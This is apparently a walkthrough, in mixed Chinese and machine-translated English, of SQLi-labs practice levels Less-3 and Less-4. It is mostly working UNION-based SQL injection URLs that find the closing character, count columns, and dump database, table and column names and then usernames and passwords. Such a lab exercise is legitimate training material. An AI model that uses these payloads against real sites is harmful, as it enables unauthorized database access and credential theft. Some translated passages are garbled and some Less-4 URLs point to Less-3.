一、less 3

1.判断闭合字符

http://192.168.1.24:83/Less-3/?id=1'
#报错信息use near ''1'') LIMIT 0,1' at line 1

http://192.168.1.24:83/Less-3/?id=1' and 1=1 -- =
#报错

?id=1 and 1=1 -- =
?id=1" and 1=1 -- =
#均不报错
?id=1 and 1=2 -- =
?id=1' and 1=2 -- =
?id=1" and 1=2 -- =
#都显示正常,Only try other characters

http://192.168.1.24:83/Less-3/?id=1') and 1=2 -- =
#最后发现id=1') and 1=2 -- =
#显示异常
http://192.168.1.24:83/Less-3/?id=1') and 1=1 -- =
#显示正常

From this, it can be preliminarily judged that it is a single-quote deformation character injection.

2.判断字段数

http://172.168.30.176/Less-3/?id=1') order by 3 -- =
#有回显

http://172.168.30.176/Less-3/?id=1') order by 4 -- =
#报错

From this, it can be determined that the number of columns is 3列.

3.结合union查看显示位

http://192.168.1.24:83/Less-3/?id=1111')  union select 1,2,3 -- =

It can be concluded that the display bit is 2、3位.

4.使用database()函数爆库名

http://192.168.1.24:83/Less-3/?id=1111')  union select 1,2,database() -- =

5.爆出security库的表名.

http://192.168.1.24:83/Less-3/?id=1111')  union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security' -- =

6.爆出security库中users表的列名.

http://192.168.1.24:83/Less-3/?id=1111')  union select 1,2,group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'-- =

7.爆出users表的username、password的数据.

http://192.168.1.24:83/Less-3/?id=1111')  union select 1,2,group_concat(concat_ws('--',username,password)) from security.users -- =

二、less 4

1.判断闭合字符

http://172.168.30.176/Less-4/?id=1'
#正常,且有回显
http://172.168.30.176/Less-4/?id=1"
#报错信息use near ''1'') LIMIT 0,1' at line 1
http://172.168.30.176/Less-4/?id=1") and 1=1 -- =
#正常
http://172.168.30.176/Less-4/?id=1") and 1=2 -- =
#异常

From this, it can be judged that it is a character injection of parentheses and double quotes.

2.判断字段数

http://172.168.30.176/Less-4/?id=1") order by 3-- =     #没有报错
http://172.168.30.176/Less-4/?id=1") order by 4-- =     #报错

It can be seen that the number of query fields is 3.

3.查询显示位（与less 3一致）

4.爆库名.

http://192.168.1.24:83/Less-3/?id=1111")  union select 1,2,database() -- =

5.爆表名.

http://192.168.1.24:83/Less-3/?id=1111")  union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security' -- =

6.爆列名.

http://192.168.1.24:83/Less-3/?id=1111")  union select 1,2,group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users' -- =

7.爆usertable sensitive data.

http://192.168.1.24:83/Less-3/?id=1111")  union select 1,2,group_concat(concat_ws('--',username,password)) from security.users -- =

总结

SQL注入的步骤如下：

如上所述,SQLThe injection is generally above7个步骤,首先判断是否存在注入点,Then determine the number of fields to query,Then judge the display bit,最后通过函数、information_schemaThe three tables of , burst out the library name in turn、表名、Column names and specific data.
Just keep this in mind7个步骤,Taking off your pants is not a dream！！！

PS：

只有MySQL5.0and above versions only come with itinformation_schema库.
三张表分别为：
table_schema(存放库名)
table_name(存放表名)
column_name(存放列名)
The main sentence used：
查库：select schema_name from information_schema.schemata
查表：select table_name from information_schema.tables where table_schema='security'
查列：select column_name from information_schema.columns where table_name='users'
查数据：select username,password from security.users